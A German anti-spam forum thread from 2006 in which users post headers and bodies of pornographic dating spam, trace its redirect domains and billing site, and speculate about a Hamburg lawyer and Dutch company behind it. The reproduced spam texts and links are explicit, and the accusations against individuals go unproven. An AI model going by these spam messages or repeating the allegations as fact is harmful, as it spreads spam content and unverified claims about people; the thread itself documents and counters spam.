From: "cstxatha" <cstxatha [at] ncweb.com>
To: <xxx>
Cc: 8 eMail-Adressen
Subject: Fickroboter (111Bb)
Message-ID: [ID filtered]
X-Mailer: MIME-tools 5.503 (Entity 5.501)
X-MimeOLE: Produced By MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--754324058229431"
X-Priority: 3
X-MSMail-Priority: Normal
X-Virus-Scanned: amavisd-new at arcor.de
X-Amavis-Alert: BAD HEADER MIME error: error: unexpected end of header

http://erg9zfdghj.info/1.html - Weiterleitung auf http://www.maschinenfick.com

Return-Path: <xxvealguyw [at] zianet.com>
X-Original-To: xxx
Received: from localhost (mail-in-04.arcor-online.net [151.189.21.44])
by mail-in-03-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Fri, 28 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-04.arcor-online.net ([127.0.0.1])
by localhost (mail-in-04 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from yourinter.net (unknown [125.247.126.10])
by mail-in-04.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Fri, 28 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from localhost (jana [127.0.0.1])
by 254.209.210.130 (Postfix) with SMTP ID: [ID filtered]
Date: Fri, 28 Apr 2006 xx:xx:xx -0-200
From: "xxvealguyw" <xxvealguyw [at] zianet.com>
X-Mailer: The Bat! (v1.60c) Business
Reply-To: xxvealguyw" xxvealguyw [at] zianet.com>
X-Priority: 3 (Normal)
Message-ID: [ID filtered]
To: 13 eMail-Adressen
Subject: im Bett ist sie die absolute Wucht! (31BB1)
MIME-Version: 1.0
Content-Type: text/plain;
Content-Transfer-Encoding: 7Bit
X-Virus-Scanned: amavisd-new at arcor.de

http://eruihg678h.info/2.html - Weiterleitung auf http://www.voegeln.de

Return-Path: <mceuufseku [at] pobox.com>
X-Original-To: xxx
Received: from localhost (mail-in-08.arcor-online.net [151.189.21.48])
by mail-in-05-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Fri, 28 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-08.arcor-online.net ([127.0.0.1])
by localhost (mail-in-08 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from perfectmail.com (unknown [125.245.81.146])
by mail-in-08.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Fri, 28 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from localhost (jana [127.0.0.1])
by 190.111.76.62 (Postfix) with SMTP ID: [ID filtered]
Date: Fri, 28 Apr 2006 xx:xx:xx -0-200
From: "mceuufseku" <mceuufseku [at] pobox.com>
X-Mailer: The Bat! (v1.60c) Business
Reply-To: mceuufseku" mceuufseku [at] pobox.com>
X-Priority: 3 (Normal)
Message-ID: [ID filtered]
To: <ccc>
Cc: 12 eMail-Adressen
Subject: Mutter und Tochter (5B11B)
MIME-Version: 1.0
Content-Type: text/plain;
Content-Transfer-Encoding: 7Bit
X-Virus-Scanned: amavisd-new at arcor.de

http://eruihg678h.info/3.html - Weiterleitung auf http://www.mutterundtochter.cc

Return-Path: <ylnoypc [at] moderndigital.net>
X-Original-To: xxx
Received: from localhost (mail-in-08.arcor-online.net [151.189.21.48])
by mail-in-02-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sat, 29 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-08.arcor-online.net ([127.0.0.1])
by localhost (mail-in-08 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from mo.net (unknown [125.247.115.130])
by mail-in-08.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sat, 29 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from 176.206.208.137 by 125.246.128.254; Sat, 29 Apr 2006 xx:xx:xx -0-200
From: "ylnoypc" <ylnoypc [at] moderndigital.net>
Reply-To: "ylnoypc" <ylnoypc [at] moderndigital.net>
To: 13 eMail-Adressen
Subject: Abnormal geil, extrem verdorben (2bb11)
Date: Sat, 29 Apr 2006 xx:xx:xx -0-200
Message-ID: [ID filtered]
Content-Type: multipart/alternative;
boundary="--597829298560522"
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: MIME-tools 5.503 (Entity 5.501)
X-MimeOLE: Produced By MIME-tools 5.503 (Entity 5.501)
X-Virus-Scanned: amavisd-new at arcor.de

http://eruihg678h.info/4.html - Weiterleitung auf http://www.extremesexchannels.tv

Return-Path: <ugyvdgbp [at] arkansas.net>
X-Original-To: xxx
Received: from localhost (mail-in-06.arcor-online.net [151.189.21.46])
by mail-in-10-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Thu, 27 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-01.arcor-online.net ([127.0.0.1])
by localhost (mail-in-06 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from rr.com (unknown [147.160.181.80])
by mail-in-01.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Thu, 27 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from 53.78.230.14 by 239.32.240.140.arkansas.net with DAV;
Thu, 27 Apr 2006 xx:xx:xx -0-200
Reply-To: "ugyvdgbp" <ugyvdgbp [at] arkansas.net>
From: "ugyvdgbp" <ugyvdgbp [at] arkansas.net>
To: 8 eMail-Adressen
Subject: Nutten am Start (311bb)
Date: Thu, 27 Apr 2006 xx:xx:xx -0-200
Message-ID: [ID filtered]
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_000A_01C66A1B.C1161930"
X-Virus-Scanned: amavisd-new at arcor.de

http://erg9zfdghj.info/16.html - Weiterleitung auf http://www.hure.de

Und diese Drecks-Cyberservices-Spammer inkl. dem "sauberen" Rechstverdreher sind wieder sehr aktiv.:mad:

in diesem Sinne

Oliver

oliveer
30.04.2006, 12:10
Return-Path: <taqephjw [at] webserf.net>
X-Original-To: xxx
Received: from localhost (mail-in-08.arcor-online.net [151.189.21.48])
by mail-in-03-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sun, 30 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-08.arcor-online.net ([127.0.0.1])
by localhost (mail-in-08 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from wcoil.com (bxo66.internetdsl.tpnet.pl [83.18.248.66])
by mail-in-08.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sun, 30 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from localhost (jana [127.0.0.1])
by 156.44.157.167 (Postfix) with SMTP ID: [ID filtered]
Date: Sun, 30 Apr 2006 xx:xx:xx -0-200
From: "taqephjw" <taqephjw [at] webserf.net>
X-Mailer: The Bat! (v1.60c) Business
Reply-To: taqephjw" taqephjw [at] webserf.net>
X-Priority: 3 (Normal)
Message-ID: [ID filtered]
To: <xxx>
Cc: 12 eMail-Adressen
Subject: Hausfrauen vernachlässigt (6Bb11)
MIME-Version: 1.0
Content-Type: text/plain;
Content-Transfer-Encoding: 7Bit
X-Virus-Scanned: amavisd-new at arcor.de
X-Amavis-Alert: BAD HEADER Non-encoded 8-bit data (char E4 hex) in message header 'Subject': Subject: Hausfrauen vernachl\344ssigt (6Bb11)\n

http://489hrekhrt.info/5.html - Weiterleitung auf http://www.milf.de

Return-Path: <hkywdw [at] fcc.net>
X-Original-To: xxx
Received: from localhost (mail-in-01.arcor-online.net [151.189.21.41])
by mail-in-02-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sun, 30 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-01.arcor-online.net ([127.0.0.1])
by localhost (mail-in-01 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from fastermail.com (unknown [202.29.22.190])
by mail-in-01.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Sun, 30 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from 112.188.54.175 by 202.29.22.190; Sun, 30 Apr 2006 xx:xx:xx -0-200
Error-To: hkywdw [at] fcc.net
Reply-To: hkywdw [at] fcc.net
Date: Sun, 30 Apr 2006 xx:xx:xx -0-200
From: "hkywdw" <hkywdw [at] fcc.net>
To: 13 eMail-Adressen
Message-ID: [ID filtered]
Subject: Swingermobil (21111)
Content-Type: multipart/alternative;
boundary="--10554298711642332"
MIME-Version: 1.0
X-Mailer: MIME-tools 5.503 (Entity 5.501)
X-MimeOLE: Produced By MIME-tools 5.503 (Entity 5.501)
X-Priority: 3 (Normal)
X-Virus-Scanned: amavisd-new at arcor.de

http://489hrekhrt.info/6.html - Weiterleitung auf http://www.swingermobil.com/

...und der Terror geht weiter... :mad: Aber man kann ja alles schön zu diesem Rechtsverdreher weiterleiten, der freut sich bestimmt. :rolleyes:

Ist ja mittlerweile seine 3.Domain, die bespammt wird...

in diesem Sinne

Oliver

oliveer
02.05.2006, 07:01
Return-Path: <zbjqlwsw [at] pyramid.net>
X-Original-To: xxx
Received: from localhost (mail-in-02.arcor-online.net [151.189.21.42])
by mail-in-08-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Tue, 2 May 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-02.arcor-online.net ([127.0.0.1])
by localhost (mail-in-02 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from primary.net (unknown [216.241.14.30])
by mail-in-02.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Tue, 2 May 2006 xx:xx:xx +0200 (CEST)
Received: from 2.38.3.138
by 135.170.115.143.pyramid.net (Postfix) with SMTP ID: [ID filtered]
X-Originating-IP: [225.114.35.197]
X-Originating-Email: [zbjqlwsw [at] pyramid.net]
X-Sender: zbjqlwsw [at] pyramid.net
From: "zbjqlwsw" <zbjqlwsw [at] pyramid.net>
To: 13 eMail-Adressen
Subject: Singles, Ehefrauen und Swinger in jedem Alter
Date: Tue, 02 May 2006 xx:xx:xx -0-200
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: [ID filtered]
X-Virus-Scanned: amavisd-new at arcor.de

http://4rekghrkjg.info/7.html - Weiterleitung auf http://www.bumskontakte.de


Return-Path: <ingrid.w [at] katamail.com>
X-Original-To: xxx
Received: from localhost (mail-in-01.arcor-online.net [151.189.21.41])
by mail-in-06-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <xxx>; Sun, 30 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-01.arcor-online.net ([127.0.0.1])
by localhost (mail-in-01 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Sun, 30 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from fe-7c.inet.it (fe-7c.inet.it [213.92.5.114])
by mail-in-01.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <xxx>; Sun, 30 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from dslb-082-083-110-050.pools.arcor-ip.net ([::ffff:82.83.110.50]) by fe-7c.inet.it via I-SMTP-5.2.3-521
ID: [ID filtered]
Subject: ich habs gewußt
Sender: "Ingrid" <ingrid.w [at] katamail.com>
From: "Ingrid" <ingrid.w [at] katamail.com>
Date: Sun, 30 Apr 2006 xx:xx:xx +0200
To: "xxx " <xxx>
X-Priority: 3
X-MSMail-Priority: Normal
Content-Transfer-Encoding: Quoted-Printable
MIME-Version: 1.0
X-Mailer: JMail 4.4 by Dimac
Content-Type: text/plain;
charset="iso-8859-1"
Message-ID: [ID filtered]
X-Virus-Scanned: amavisd-new at arcor.de


http://4rekghrkjg.info/8.html - Weiterleitung auf http://www.extreme-xxx.cc



Schon wieder der saubere Anwalt aus Hamburg - ob denn die Rechtsanwaltskammer Hamburg über seine Aktivitäten im Bilde ist ?

Wenn nicht sollte man sie ja vielleicht mal informieren... :rolleyes:

in diesem Sinne

Oliver

Silke074
02.05.2006, 10:59
Received: from [218.246.181.19] (helo=netster.com)
by mx27.web.de with esmtp (WEB.DE 4.107 #108)
ID: [ID filtered]
Received: from localhost (jana [127.0.0.1])
by 92.132.112.44 (Postfix) with SMTP ID: [ID filtered]
Date: Tue, 02 May 2006 xx:xx:xx -0-200
From: "ukbfgehzhp" <ukbfgehzhp [at] pacer.com>
X-Mailer: The Bat! (v1.60c) Business
Reply-To: ukbfgehzhp" ukbfgehzhp [at] pacer.com>
X-Priority: 3 (Normal)
Message-ID: [ID filtered]
To:
xyz (at) web .de
hier folgen noch 13 Mail-Addis alle bei web. de
Subject: Singles, Ehefrauen und Swinger in jedem Alter
MIME-Version: 1.0
Content-Type: text/plain;
Content-Transfer-Encoding: 7Bit
Sender: ukbfgehzhp [at] pacer.com

Na aboelk,

Bumskontakte!!
Diese Frauen suchen den schnellen unkomplizierten Sex.
DU bist bestimmt genau der Richtige!!
Singles, Ehefrauen und Swinger in jedem Alter warten
auf DICH!

http://4rekghrkjg.info/7.html

tschuess
ukbfgehzhp

1Bb11
5b1B

-------------------------------------------------------------------------------------
Moechtest du dich abmelden? Sende eine eMail
mit dem Titel "abmelden" an byebye987 [at] netscape.net

contrawerbemails
09.05.2006, 12:23
z. Bsp.: hier (http://cert.uni-stuttgart.de/stats/dns-replication.php)

- kjz


Danke schön, sehr interessant.

kjz1
09.05.2006, 14:16
Und mal wieder Post von Cyberservices. Beworben wird: http://www.infomaniac.cc Letztendlich geht es aber nur zur Abzock-Seite unter:

http://www.cybilling.com/anmeldung/lz_anmelden.php? WMID=71063&PID=2&PGID=180&LID=50064&AC=1&LGID=en

Das Ganze hatten wir aber schon http://www.antispam-ev.de/forum/showthread.php?t=10629&highlight=71063

- kjz

Investi
12.05.2006, 22:00
[...] ob denn die Rechtsanwaltskammer Hamburg über seine Aktivitäten im Bilde ist ?

Wenn nicht sollte man sie ja vielleicht mal informieren... :rolleyes:
Die Hanseatische Anwaltskammer ist merkbefreit. Aber es laufen in dieser Richtung bereits mehrere Maßnahmen.

oliveer
13.05.2006, 10:43
Die Hanseatische Anwaltskammer ist merkbefreit. Aber es laufen in dieser Richtung bereits mehrere Maßnahmen.

Sch... dann muss ich mir doch was anderes nettes für ihn einfallen lassen :rolleyes: Ob sich die Presse für seine Arbeit interessiert. ;)

in diesem Sinne

Oliver

Investi
23.05.2006, 14:30
Aber es laufen in dieser Richtung bereits mehrere Maßnahmen.
Nachdem ich heute zwei Mails mit dem Betreff "K l u m & Co ganz nackt" (Sperrschrift von mir eingesetzt) erhalten habe, habe ich heute morgen eine Nachricht an die H.K. GmbH & Co. KG geschickt und die Mail weitergeleitet. Nun führte ich soeben ein nettes Gespräch mit der Firma des berühmten Models. Ihr Vater wird sich morgen mit mir in Verbindung setzen, da er die Nachricht soeben in einem Termin mit seinen Anwälten bespricht. Insbesondere die zweite Mail landete auf einem Account, der eine Verbindung zu einem 'pornografischen Anwalt' in Hamburg nachweisen kann.

dk99hi
25.05.2006, 21:07
Jetzt hab ich mit einer extra für diesen Zweck erzeugten Adresse an
byebye987 [at] netscape.net
geschrieben.

Heute kommt doch glatt ein neuer Spam:

Eingeworfen bei 210.125.95.16

Im To 10 Adressen

Der Text:

Hallo,

ich bin die Attelina, 19 Jahre und bin auf der Suche nach einem
heißen Quickie am Telefon. Du musst keine 0190 Nummer wählen.
Ruf mich aber bitte nicht tagsüber an, da mein Mann da zu hause ist.
Manchmal ist er auch auf Montage, am besten du meldest dich mal:

0227-39402 achtunzwanzig

Deine Süße
Attelina


Absender der Mail war angeblich ein Bernd ;)

Die Reverssuche ergibt tatsächlich eine Attelina
Hab die letzten Ziffern ausgeschrieben, da ich von einem Joe Job ausgehe

Stardust
25.05.2006, 23:22
Jetzt hab ich mit einer extra für diesen Zweck erzeugten Adresse an
byebye987 [at] netscape.net
geschrieben.

Heute kommt doch glatt ein neuer Spam:



An die neue Adresse?

PS. den gleichen Mist habe ich heute auch erhalten!

dk99hi
26.05.2006, 00:24
An die neue Adresse?

PS. den gleichen Mist habe ich heute auch erhalten!

Ja an die neue Adresse mit 9 weiteren Empfängern im mailto

Stardust
26.05.2006, 12:36
Das bestätigt mal wieder die alte Regel: nie einen Abmeldelink oder eine Abmelde-Adresse verwenden, da damit die Echtheit der eigenen Adresse bestätigt wird.

dk99hi
26.05.2006, 13:54
Das bestätigt mal wieder die alte Regel: nie einen Abmeldelink oder eine Abmelde-Adresse verwenden, da damit die Echtheit der eigenen Adresse bestätigt wird.

Ich hab mich doch absichtlich abgemeldet. :D
Will ja wissen wer mit wem verstrickt ist.

Werde das Spiel mit verschiedenen Adressen noch ein paar mal wiederholen. ;)

Stardust
26.05.2006, 15:54
Ich hab mich doch absichtlich abgemeldet. :D
Will ja wissen wer mit wem verstrickt ist.

Werde das Spiel mit verschiedenen Adressen noch ein paar mal wiederholen. ;)

War ja auch nicht auf dich bezogen, da ich deine Absicht schon erkannt hatte.

Die Regel gilt nur allgemein für Abmelde-Links und -Addys.

PS: Wäre doch mal ein super Spaß, sich mit wechselnden Addys abzumelden (große Anhänge TM tuns doch auch):D

oliveer
29.05.2006, 22:59
Return-Path: <carlos8922 [at] amuro.net>
X-Original-To: xxx
Received: from localhost (mail-in-04.arcor-online.net [151.189.21.44])
by mail-in-05-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <xxx>; Sun, 28 May 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-04.arcor-online.net ([127.0.0.1])
by localhost (mail-in-04 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from mail.kt-const.com (unknown [222.118.167.142])
by mail-in-04.arcor-online.net (Postfix) with SMTP ID: [ID filtered]
for <xxx>; Sun, 28 May 2006 xx:xx:xx +0200 (CEST)
Received: from web_server.kt-const.com (222.118.167.142)
by mail.kt-const.com with ZMAIL SMTP; Sun, 28 May 2006 xx:xx:xx +0900
Message-ID: [ID filtered]
To: 4 verschiedene eMail-Adressen
From: "Kevin anderBlanckenschewr" <Carlos8922 [at] amuro.net>
Subject: Re: Lerne heisse Singles aus Deiner Umgebung kennen
Date: Sun, 28 May 2006 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Carlos8922 [at] amuro.net
X-Priority: 5
X-MSMail-Priority: Low
X-MimeOLE: Produced by Microsoft MimeOLE V5.00.3018.1300
X-Mailer: USANET web-mailer (34FM.0700.4.03)
X-Virus-Scanned: amavisd-new at arcor.de

Return-Path: <Cristobal7054 [at] amuro.net>
X-Original-To: xxx
Received: from localhost (mail-in-09.arcor-online.net [151.189.21.49])
by mail-in-03-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <xxx>; Mon, 29 May 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-09.arcor-online.net ([127.0.0.1])
by localhost (mail-in-09 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from mails.ean.com.py (ean.uninet.com.py [200.61.229.107])
by mail-in-09.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <xxx>; Mon, 29 May 2006 xx:xx:xx +0200 (CEST)
Received: from ean.uninet.com.py (IDENT:httpd [at] mails-eth1.ean.com.py [200.61.229.107])
by mails-eth1.ean.com.py (8.10.2/8.10.2) with SMTP ID: [ID filtered]
Mon, 29 May 2006 xx:xx:xx -0400
Message-ID: [ID filtered]
To: poor [at] spamvictim.tld
Cc: 4 verschiedene eMail-Adressen
From: "Mert Eggert" <Cristobal7054 [at] amuro.net>
Subject: Re: Fwd: findest Du die Frauen, die genau das gleiche suchen wie Du!
Date: Mon, 29 May 2006 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Cristobal7054 [at] amuro.net
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-Mailer: USANET web-mailer (34FM.0700.4.03)
X-Virus-Scanned: amavisd-new at arcor.de

Schau Dich jetzt auf der gr?n, deutschsprachigen Kontaktdatenbank (Deutschland, Osterreich, Die Schweiz) um, denn hier findest Du die Frauen, die genau das gleiche suchen wie Du!

In unserer Datenbank findest Du mehr als 250,000 Profile fickgeiler Schlampen, die es mal wieder so richtig besorgt bekommen wollen.

Als Mitglied hast Du die M?chkeit in diesen Profilen zu st?n and Dir Das Girl, was Dir gefallt heraus zu suchen um mit ihr in Kontakt zu treten.

Jetzt Mitglied werden: http://skt.purefun.cc/de/index.html


Wenn Du diesen Newsletter nicht mehr erhalten m?est, klicke einfach auf diesen Link: http://skt.purefun.cc/revoke.php

Können diese Holländer nicht mit sich selbst spielen :mad:

in diesem Sinne

Oliver

oliveer
29.05.2006, 23:01
Return-Path: <carlos8922 [at] amuro.net>
X-Original-To: xxx
Received: from localhost (mail-in-04.arcor-online.net [151.189.21.44])
by mail-in-05-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <xxx>; Sun, 28 May 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-04.arcor-online.net ([127.0.0.1])
by localhost (mail-in-04 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from mail.kt-const.com (unknown [222.118.167.142])
by mail-in-04.arcor-online.net (Postfix) with SMTP ID: [ID filtered]
for <xxx>; Sun, 28 May 2006 xx:xx:xx +0200 (CEST)
Received: from web_server.kt-const.com (222.118.167.142)
by mail.kt-const.com with ZMAIL SMTP; Sun, 28 May 2006 xx:xx:xx +0900
Message-ID: [ID filtered]
To: 4 verschiedene eMail-Adressen
From: "Kevin anderBlanckenschewr" <Carlos8922 [at] amuro.net>
Subject: Re: Lerne heisse Singles aus Deiner Umgebung kennen
Date: Sun, 28 May 2006 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Carlos8922 [at] amuro.net
X-Priority: 5
X-MSMail-Priority: Low
X-MimeOLE: Produced by Microsoft MimeOLE V5.00.3018.1300
X-Mailer: USANET web-mailer (34FM.0700.4.03)
X-Virus-Scanned: amavisd-new at arcor.de

Return-Path: <Cristobal7054 [at] amuro.net>
X-Original-To: xxx
Received: from localhost (mail-in-09.arcor-online.net [151.189.21.49])
by mail-in-03-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <xxx>; Mon, 29 May 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-09.arcor-online.net ([127.0.0.1])
by localhost (mail-in-09 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from mails.ean.com.py (ean.uninet.com.py [200.61.229.107])
by mail-in-09.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <xxx>; Mon, 29 May 2006 xx:xx:xx +0200 (CEST)
Received: from ean.uninet.com.py (IDENT:httpd [at] mails-eth1.ean.com.py [200.61.229.107])
by mails-eth1.ean.com.py (8.10.2/8.10.2) with SMTP ID: [ID filtered]
Mon, 29 May 2006 xx:xx:xx -0400
Message-ID: [ID filtered]
To: poor [at] spamvictim.tld
Cc: 4 verschiedene eMail-Adressen
From: "Mert Eggert" <Cristobal7054 [at] amuro.net>
Subject: Re: Fwd: findest Du die Frauen, die genau das gleiche suchen wie Du!
Date: Mon, 29 May 2006 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Cristobal7054 [at] amuro.net
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-Mailer: USANET web-mailer (34FM.0700.4.03)
X-Virus-Scanned: amavisd-new at arcor.de

Schau Dich jetzt auf der gr?n, deutschsprachigen Kontaktdatenbank (Deutschland, Osterreich, Die Schweiz) um, denn hier findest Du die Frauen, die genau das gleiche suchen wie Du!

In unserer Datenbank findest Du mehr als 250,000 Profile fickgeiler Schlampen, die es mal wieder so richtig besorgt bekommen wollen.

Als Mitglied hast Du die M?chkeit in diesen Profilen zu st?n and Dir Das Girl, was Dir gefallt heraus zu suchen um mit ihr in Kontakt zu treten.

Jetzt Mitglied werden: http://skt.purefun.cc/de/index.html


Wenn Du diesen Newsletter nicht mehr erhalten m?est, klicke einfach auf diesen Link: http://skt.purefun.cc/revoke.php

Wieder mal der übliche holländische Müll - können diese nicht mit sich selbst spielen :mad:

in diesem Sinne

Oliver

oliveer
03.06.2006, 19:34
Received: from [140.116.229.2] (helo=ms8.cc.ncku.edu.tw)
by mx28.web.de with esmtp (WEB.DE 4.107 #114)
ID: [ID filtered]
Received: from ms8.cc.ncku.edu.tw (ms8.cc.ncku.edu.tw [127.0.0.1])
by ms8.interscan (Postfix) with ESMTP
ID: [ID filtered]
Received: from pc-58-137.hosp.ncku.edu.tw (unknown [140.116.58.137])
by ms8.cc.ncku.edu.tw (Postfix) with SMTP
ID: [ID filtered]
Message-ID: [ID filtered]
To: xxx
Cc: 6 eMail-Adressen
From: "Bastian Drees" <Dana7365 [at] amuro.net>
Subject: Re: Fwd: Dein nächster Fick wartet schon auf Dich!
Date: Sat, 03 Jun 2006 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Dana7365 [at] amuro.net
X-Priority: 3
X-MSMail-Priority: Low
X-MimeOLE: Produced by Microsoft MimeOLE V5.00.2919.6600
X-Mailer: Lotus Notes Release 5.0.5 September 22, 2000
Sender: Dana7365 [at] amuro.net

Schau Dich jetzt auf der grön, deutschsprachigen Kontaktdatenbank (Deutschland, Osterreich, Die Schweiz) um, denn hier findest Du die Frauen, die genau das gleiche suchen wie Du!

In unserer Datenbank findest Du mehr als 250,000 Profile fickgeiler Schlampen, die es mal wieder so richtig besorgt bekommen wollen.

Als Mitglied hast Du die Möchkeit in diesen Profilen zu stön and Dir Das Girl, was Dir gefallt heraus zu suchen um mit ihr in Kontakt zu treten.

Jetzt Mitglied werden: http://skt.purefun.cc/de/index.html


Wenn Du diesen Newsletter nicht mehr erhalten möest, klicke einfach auf diesen Link: http://skt.purefun.cc/revoke.php

Ob dieser "seriöse" Rechtsverdreher dort schon angemeldet ist ? :rolleyes: Sein nettes Foto auf seiner HP kann man doch bestimmt gut als Vorlage für den Kontaktmarkt nehmen... :rolleyes:

in diesem Sinne

Oliver

gation
03.06.2006, 20:57
Was sagt eigentlich Nukunonu (Tokelau) zum Jugendschutz? Oder wird da Stammesrat gehalten und anschliessend der Domaininhaber gegrillt?
http://de.wikipedia.org/wiki/Nukunonu

Auf Nukunonu zählt man z.B. unterschiedlich, je nachdem, was man zählt.
http://www.nukunonu.tk/page006.html

Falls mal jemand ein whois braucht:
http://www.dot.tk/en/pageA50.html

Die Whois-Telefonnummer gehört aber gar nicht zu Nukunonu, sondern das ist ein handy aus Tonga:

Information on phone number range +676 685XX
Number billable as mobile number
Country or destination Tonga
City or exchange location Ha’apai Group
Original network provider* U-Call
http://www.britannica.com/eb/article-9038679

Ist bei Kiribati in der Nähe.
So. Spammer fördern meine Bildung. Wow.

Was ist eigentlich die Rolle von RPS/Viacom (http://katalog.seznam.cz/18/03/77-viakom-dovozce-a-distributor-cctv.html?sekce=1321)? (ich verstehe das immer nie, wer da welche Verantwortung trägt)

oliveer
03.06.2006, 21:49
Ich denke mal, dass alles nur Augenwischerei ist, um von den dubiosen Holländern abzulenken, denn sämtliche Links von der Seite gehen zu http://www2.cybilling.com ! Mittlerweile gibt es auch Insiderinfos, dass die ganze Spamaktion von Deutschland aus gesteuert werden - nur ist es momentan noch etwas schwierig die entsprechenden Beweise aufzutreiben... Aber was ja noch nicht ist, kann ja noch werden...

in diesem Sinne

Oliver

gation
03.06.2006, 21:57
Und die Holländer sind nicht Augenwischerei, um von gewissen Deutschen abzulenken? Oder anders formuliert: Wenn man genau wüsste, das hat der Herr X aus Köln oder der Herr Y aus Hamburg gemacht - was dann?

Goofy
03.06.2006, 22:03
Wissen und beweisen sind zwei verschiedene Dinge.

gation
03.06.2006, 22:22
Das ist klar... Weiss jemand, was das "k.A." im whois anderes heissen könnte als (deutsch) für "keine Angaben"?
Nukunonu, NONE k. A.

oliveer
03.06.2006, 22:38
Das ist klar... Weiss jemand, was das "k.A." im whois anderes heissen könnte als (deutsch) für "keine Angaben"?
Nukunonu, NONE k. A.

Anscheinend scheint denen wohl die Ideen für die weiteren Angaben ausgegangen zu sein... ;)

in diesem Sinne

Oliver

Goofy
03.06.2006, 22:39
"keine Angaben" wäre plausibel. Auch das englische "NONE" würde dazu passen.

gation
03.06.2006, 23:23
Hmm "Wie man anhand des Bildes schon ganz richtig vermutet ist Claudia eine echte Frohnatur und lacht gerne." (skt.purefun.cc)

"Wie man anhand des Bildes schon ganz richtig vermutet ist Claudia eine echte Frohnatur und lacht gerne." (xxxkontakte.cc)
Hmm
Copyright © 1996 - 2005 Cyberservices B.V. All Rights Reserved

"Miriam erhofft sich von ihrem Eintrag und ihrer Anmeldung hier auf sexkontakte.cc endlich einen Mann zu finden, der ihre extremen Sexneigungen teilt" (skt.purefun.cc)

Es gibt das Zeugs auch auf einer deutschen Seite:
xcheck-online.de

"Wie man anhand des Bildes schon ganz richtig vermutet ist Claudia eine echte Frohnatur und lacht gerne."
xcheck-online.de/tgpsoft/001.htm

Leider sind die dann doch nicht ganz dumm
"Lisa erhofft sich von ihrem Eintrag und ihrer Anmeldung hier auf xcheck-online.de endlich einen Mann zu finden, der ihre extremen Sexneigungen teilt"

